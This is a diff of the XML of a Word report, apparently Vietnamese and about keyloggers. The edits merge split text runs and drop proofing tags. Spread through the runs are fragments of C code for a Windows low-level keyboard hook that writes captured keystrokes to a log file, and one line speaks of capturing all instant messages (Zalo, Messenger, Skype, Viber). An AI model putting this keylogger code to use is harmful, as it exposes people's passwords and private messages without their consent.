-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
       <w:bookmarkStart w:id="16" w:name="_Toc57761764"/>
       <w:r>
         <w:rPr>
@@ -7448,25 +7380,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Chụp bản ghi của tất cả tin nhắn tức thời (Zalo, Facebook Messenger, Skype, </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Viber,...</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t>Chụp bản ghi của tất cả tin nhắn tức thời (Zalo, Facebook Messenger, Skype, Viber,...)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9115,18 +9029,8 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">HHOOK </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>hKeyHook;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>HHOOK hKeyHook;</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -9145,25 +9049,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">BYTE </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>keyState[</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>256];</w:t>
+        <w:t>BYTE keyState[256];</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9183,25 +9069,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">WCHAR </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>buffer[</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>16];</w:t>
+        <w:t>WCHAR buffer[16];</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9221,18 +9089,8 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">KBDLLHOOKSTRUCT </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>kbdllStruct;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>KBDLLHOOKSTRUCT kbdllStruct;</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -9273,7 +9131,6 @@
         </w:rPr>
         <w:t xml:space="preserve">LRESULT WINAPI </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -9292,7 +9149,6 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -9332,7 +9188,6 @@
         <w:lastRenderedPageBreak/>
         <w:tab/>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -9349,16 +9204,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>(nCode == HC_ACTION) &amp;&amp; ((wParam == WM_SYSKEYDOWN) || (wParam == WM_KEYDOWN))){</w:t>
+        <w:t>((nCode == HC_ACTION) &amp;&amp; ((wParam == WM_SYSKEYDOWN) || (wParam == WM_KEYDOWN))){</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9432,18 +9278,8 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> *</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>LOG;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve"> *LOG;</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -9463,25 +9299,7 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">    kbdllStruct = *((KBDLLHOOKSTRUCT</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>*)lParam</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>);</w:t>
+        <w:t xml:space="preserve">    kbdllStruct = *((KBDLLHOOKSTRUCT*)lParam);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9502,18 +9320,8 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">    LOG = </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>fopen(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve">    LOG = fopen(</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -9592,7 +9400,6 @@
         <w:tab/>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -9609,16 +9416,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>(</w:t>
+        <w:t>((</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9738,24 +9536,7 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>fprintf(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">LOG, </w:t>
+        <w:t xml:space="preserve">fprintf(LOG, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9819,7 +9600,6 @@
         </w:rPr>
         <w:tab/>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -9838,7 +9618,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -9918,25 +9697,7 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">            </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>fprintf(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>LOG,</w:t>
+        <w:t xml:space="preserve">            fprintf(LOG,</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9985,7 +9746,6 @@
         </w:rPr>
         <w:tab/>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -10004,7 +9764,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10084,25 +9843,7 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">            </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>fprintf(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">LOG, </w:t>
+        <w:t xml:space="preserve">            fprintf(LOG, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10151,7 +9892,6 @@
         </w:rPr>
         <w:tab/>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -10170,7 +9910,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10250,25 +9989,7 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">            </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>fprintf(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>LOG,</w:t>
+        <w:t xml:space="preserve">            fprintf(LOG,</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10317,7 +10038,6 @@
         </w:rPr>
         <w:tab/>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -10334,16 +10054,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">            </w:t>
+        <w:t xml:space="preserve">;            </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10424,25 +10135,7 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">            </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>fprintf(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>LOG,</w:t>
+        <w:t xml:space="preserve">            fprintf(LOG,</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10491,7 +10184,6 @@
         </w:rPr>
         <w:tab/>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -10510,7 +10202,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10599,24 +10290,7 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>fprintf(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>LOG,</w:t>
+        <w:t>fprintf(LOG,</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10665,7 +10339,6 @@
         </w:rPr>
         <w:tab/>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -10684,7 +10357,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10764,25 +10436,7 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">            </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>fprintf(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>LOG,</w:t>
+        <w:t xml:space="preserve">            fprintf(LOG,</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10831,7 +10485,6 @@
         </w:rPr>
         <w:tab/>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -10850,7 +10503,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10939,24 +10591,7 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>fprintf(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>LOG,</w:t>
+        <w:t>fprintf(LOG,</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11005,7 +10640,6 @@
         </w:rPr>
         <w:tab/>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -11024,7 +10658,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -11104,25 +10737,7 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">            </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>fprintf(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>LOG,</w:t>
+        <w:t xml:space="preserve">            fprintf(LOG,</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11171,7 +10786,6 @@
         </w:rPr>
         <w:tab/>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -11190,7 +10804,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -11270,25 +10883,7 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">            </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>fprintf(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>LOG,</w:t>
+        <w:t xml:space="preserve">            fprintf(LOG,</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11337,7 +10932,6 @@
         </w:rPr>
         <w:tab/>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -11356,7 +10950,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -11475,25 +11068,7 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">            </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>fprintf(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>LOG,</w:t>
+        <w:t xml:space="preserve">            fprintf(LOG,</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11542,7 +11117,6 @@
         </w:rPr>
         <w:tab/>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -11561,7 +11135,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -11680,25 +11253,7 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">            </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>fprintf(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>LOG,</w:t>
+        <w:t xml:space="preserve">            fprintf(LOG,</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11747,7 +11302,6 @@
         </w:rPr>
         <w:tab/>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -11766,7 +11320,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -11865,18 +11418,8 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>((PBYTE)&amp;keyState</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>);</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>((PBYTE)&amp;keyState);</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -11898,7 +11441,6 @@
         <w:tab/>
         <w:t xml:space="preserve">            </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -11915,16 +11457,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">kbdllStruct.vkCode, kbdllStruct.scanCode, (PBYTE)&amp;keyState, (LPWSTR)&amp;buffer, </w:t>
+        <w:t xml:space="preserve">(kbdllStruct.vkCode, kbdllStruct.scanCode, (PBYTE)&amp;keyState, (LPWSTR)&amp;buffer, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11963,25 +11496,7 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">            </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>fprintf(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">LOG, </w:t>
+        <w:t xml:space="preserve">            fprintf(LOG, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12030,7 +11545,6 @@
         </w:rPr>
         <w:tab/>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -12049,7 +11563,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -12090,25 +11603,7 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
